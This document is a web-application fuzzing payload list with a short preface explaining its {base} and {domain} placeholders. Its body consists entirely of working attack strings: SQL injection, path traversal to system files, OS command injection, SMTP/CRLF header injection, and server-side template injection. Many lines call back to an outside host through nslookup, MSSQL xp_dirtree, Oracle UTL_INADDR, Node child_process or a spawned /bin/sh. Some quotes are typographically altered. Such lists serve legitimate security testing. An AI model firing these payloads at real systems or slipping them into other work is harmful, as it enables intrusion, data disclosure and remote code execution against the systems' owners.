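Fuzzing Payloads

One test string per line. {base} appears to stand for the parameter's original value and {domain} for a callback hostname controlled by whoever runs the test; both are presumably substituted by the tool that consumes this list. The curly quotes and long dashes in this copy appear to be typographic substitutions made by the publishing platform rather than part of the original strings, so anyone reusing the lines as input-validation test cases or detection signatures should check them against a clean source first.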

\
\\
{base}-0
{base}*1
{base}’||’
{base}’+’
{base}’ ‘
“”
{base}”||”
{base}/*_*/
‘{base}’
“{base}”
({base})
`
{base}’–
{base}’)–
{base}’))–
{base}’#
{base}’)#
{base}’))#
{base}’ and ‘z’=’z
{base}’ or ‘z’=’z
{base}” or “z”=”z
}}
${77*77}
{{77*77}}
xsstest'”><
/{base}
./{base}
../{base}
/./{base}
/../{base}
xxx/../{base}
{base}::$DATA
../../../../../../../../../../../../etc/hosts
..\..\..\..\..\..\..\..\..\..\..\..\windows/win.ini
../../../../../../../../../../boot.ini
../../../../../../../../../../windows/win.ini
{base}))))))))))
{base}|| ping -i 30 127.0.0.1 ; x || ping -n 30 127.0.0.1 &
{base}| ping -i 30 127.0.0.1 |
{base}| ping -n 30 127.0.0.1 |
{base}& ping -i 30 127.0.0.1 &
{base}& ping -n 30 127.0.0.1 &
{base}; ping -c 5 127.0.0.1 ;
{base}%0a ping -i 30 127.0.0.1 %0a
`ping -c 5 127.0.0.1`
{base}| id
{base}& id
{base}; id
`id`
;echo 111111
echo 111111
response.write 111111
:response.write 111111
http:///
%0aCc:
%0d%0aCc:
%0aBcc:
%0d%0aBcc:
{base}%0aDATA%0afoo%0a%2e%0aMAIL+FROM:+%0aRCPT+TO:+%0aDATA%0aFrom:+%0aTo:+%0aSubject:+tst%0afoo%0a%2e%0a
%0d%0aDATA%0d%0afoo%0d%0a%2e%0d%0aMAIL+FROM:+%0d%0aRCPT+TO:+%0d%0aDATA%0d%0aFrom:+%0d%0aTo:+%0d%0aSubject:+test%0d%0afoo%0d%0a%2e%0d%0a
{base}”,”x”:”
{base}”],”x”:[“
{base},”x”:1
{base}” a=”
{base}” xmlns:xsi=”
{base} a=””
{base}’ a=’
{base}’ xmlns:xsi=’
{base}
{base}
xsstest
xsstest%00″<>’
{77*77}
{{{77*77}}}
${{77*77}}
#{77*77}
[[77*77]]
{{=77*77}}
[[${77*77}]]
<%=77*77%>
${xyz|77*77}
#set($x=77*77)${x}
@(77*77)
${#ctx.getClass()}
<#assign xy=”zxxxxxxz”><#assign yx=”zyyyyyyz”>${yx}${xy}
nslookup {domain}&
`nslookup {domain}`
|nslookup {domain}&
‘”`0&nslookup {domain}&`’
&nslookup -q=cname {domain}&’\”`0&nslookup {domain}&`’
+eval(“require’socket’\nSocket.gethostbyname(‘{domain}’)”)+’
eval(“require’socket’\nSocket.gethostbyname(‘{domain}’)”)
“+eval(“require’socket’\nSocket.gethostbyname(‘{domain}’)”)+”
‘+eval(compile(‘for x in range(1):\n import socket\n socket.gethostbyname(“{domain}”)’,’a’,’single’))+’
eval(compile(‘for x in range(1):\n import socket\n socket.gethostbyname(“{domain}”)’,’a’,’single’))
gethostbyname(‘{domain}’)
‘.gethostbyname(‘{domain}’).’
‘.gethostbyname(“{domain}”).’
{${gethostbyname(“{domain}”)}}
require(‘child_process’).exec(‘nslookup {domain}’)
‘-require(‘child_process’).exec(‘nslookup {domain}’)-‘
“-require(“child_process”).exec(“nslookup {domain}”)-“
<% require(‘child_process’).exec(‘nslookup {domain}’); %>
<% require(“child_process”).exec(“nslookup {domain}”); %>
||UTL_INADDR.get_host_address(‘{domain}’)
‘||UTL_INADDR.get_host_address(‘{domain}’)||’
||extractvalue(xmltype(‘%xxx;]>’),’/l’)
‘||extractvalue(xmltype(‘%xxx;]>’),’/l’)||’
UTL_INADDR.get_host_address(ORACLE_ENCODE_STRING({domain}))
or chr(1)=UTL_INADDR.get_host_address(ORACLE_ENCODE_STRING({domain}))
extractvalue(xmltype(ORACLE_ENCODE_STRING(%xxx;]>),ORACLE_ENCODE_STRING(/l))
or chr(1)=extractvalue(xmltype(ORACLE_ENCODE_STRING(%xxx;]>),ORACLE_ENCODE_STRING(/l))
(select load_file(‘\\\\{domain}\\c’))
‘+(select load_file(‘\\\\{domain}\\e’))+’
;EXEC master..xp_dirtree ‘\\{domain}\s’–
1;EXEC master..xp_dirtree ‘\\{domain}\s’–
‘;EXEC master..xp_dirtree ‘\\{domain}\s’–
‘);EXEC master..xp_dirtree ‘\\{domain}\s’–
;EXEC master..xp_dirtree “\\{domain}\s”–
1;EXEC master..xp_dirtree “\\{domain}\s”–
“;EXEC master..xp_dirtree “\\{domain}\s”–
“);EXEC master..xp_dirtree “\\{domain}\s”–
“=”;EXEC master..xp_dirtree “\\{domain}\s”–
“=”);EXEC master..xp_dirtree “\\{domain}\s”–
;DECLARE @x AS VARCHAR(255);select @x=MSSQL_ENCODE_STRING(master..xp_dirtree ‘\\{domain}\s’);EXEC(@x)–
1;DECLARE @x AS VARCHAR(255);select @x=MSSQL_ENCODE_STRING(master..xp_dirtree ‘\\{domain}\s’);EXEC(@x)–
‘;DECLARE @x AS VARCHAR(255);select @x=MSSQL_ENCODE_STRING(master..xp_dirtree ‘\\{domain}\s’);EXEC(@x)–
‘);DECLARE @x AS VARCHAR(255);select @x=MSSQL_ENCODE_STRING(master..xp_dirtree ‘\\{domain}\s’);EXEC(@x)–
“;DECLARE @x AS VARCHAR(255);select @x=MSSQL_ENCODE_STRING(master..xp_dirtree ‘\\{domain}\s’);EXEC(@x)–
“);DECLARE @x AS VARCHAR(255);select @x=MSSQL_ENCODE_STRING(master..xp_dirtree ‘\\{domain}\s’);EXEC(@x)–
“=”;DECLARE @x AS VARCHAR(255);select @x=MSSQL_ENCODE_STRING(master..xp_dirtree ‘\\{domain}\s’);EXEC(@x)–
“=”);DECLARE @x AS VARCHAR(255);select @x=MSSQL_ENCODE_STRING(master..xp_dirtree ‘\\{domain}\s’);EXEC(@x)–
\’;DECLARE @x AS VARCHAR(255);select @x=MSSQL_ENCODE_STRING(master..xp_dirtree ‘\\{domain}\s’);EXEC(@x)–
\”;DECLARE @x AS VARCHAR(255);select @x=MSSQL_ENCODE_STRING(master..xp_dirtree ‘\\{domain}\s’);EXEC(@x)–
rmi://{domain}/go
ldap://{domain}/cn=bar,dc=test,dc=org
” xmlns:xsi=”http://www.w3.org/2001/XMLSchema-instance” xsi:noNamespaceSchemaLocation=”http://{domain}/x.xsd
%xx;]>
*/–>”‘>
*/–>”‘>
“–>’–>`–>
javascript:/*
<#assign ex=”freemarker.template.utility.Execute”?new()> ${ ex(“nslookup {domain}”) }
{Smarty_Internal_Write_File::writeFile($SCRIPT_NAME,””,self::clearConfig())}
{domain}
http://{domain}
https://{domain}
%20{!xmlparser v=”}%20
” {!xmlparser v=”} “
“) {!xmlparser v=”} (“
&shards={domain}/sr
#{“”.getClass().forName(“javax.script.ScriptEngineManager”).newInstance().getEngineByName(“JavaScript”).eval(“new java.lang.ProcessBuilder[\”(java.lang.String[])\”]([\”/bin/sh\”,\”-c\”,\”nslookup {domain}\”]).start()”)}
}#{“”.getClass().forName(“javax.script.ScriptEngineManager”).newInstance().getEngineByName(“JavaScript”).eval(“new java.lang.ProcessBuilder[\”(java.lang.String[])\”]([\”/bin/sh\”,\”-c\”,\”nslookup {domain}\”]).start()”)}#{
#{”.getClass().forName(‘javax.script.ScriptEngineManager’).newInstance().getEngineByName(‘JavaScript’).eval(‘new java.lang.ProcessBuilder[\'(java.lang.String[])\’]([\’/bin/sh\’,\’-c\’,\’nslookup {domain}\’]).start()’)}
}#{”.getClass().forName(‘javax.script.ScriptEngineManager’).newInstance().getEngineByName(‘JavaScript’).eval(‘new java.lang.ProcessBuilder[\'(java.lang.String[])\’]([\’/bin/sh\’,\’-c\’,\’nslookup {domain}\’]).start()’)}#{
${“”.getClass().forName(“javax.script.ScriptEngineManager”).newInstance().getEngineByName(“JavaScript”).eval(“new java.lang.ProcessBuilder[\”(java.lang.String[])\”]([\”/bin/sh\”,\”-c\”,\”nslookup {domain}\”]).start()”)}
}${“”.getClass().forName(“javax.script.ScriptEngineManager”).newInstance().getEngineByName(“JavaScript”).eval(“new java.lang.ProcessBuilder[\”(java.lang.String[])\”]([\”/bin/sh\”,\”-c\”,\”nslookup {domain}\”]).start()”)}${
${”.getClass().forName(‘javax.script.ScriptEngineManager’).newInstance().getEngineByName(‘JavaScript’).eval(‘new java.lang.ProcessBuilder[\'(java.lang.String[])\’]([\’/bin/sh\’,\’-c\’,\’nslookup {domain}\’]).start()’)}
}${”.getClass().forName(‘javax.script.ScriptEngineManager’).newInstance().getEngineByName(‘JavaScript’).eval(‘new java.lang.ProcessBuilder[\'(java.lang.String[])\’]([\’/bin/sh\’,\’-c\’,\’nslookup {domain}\’]).start()’)}${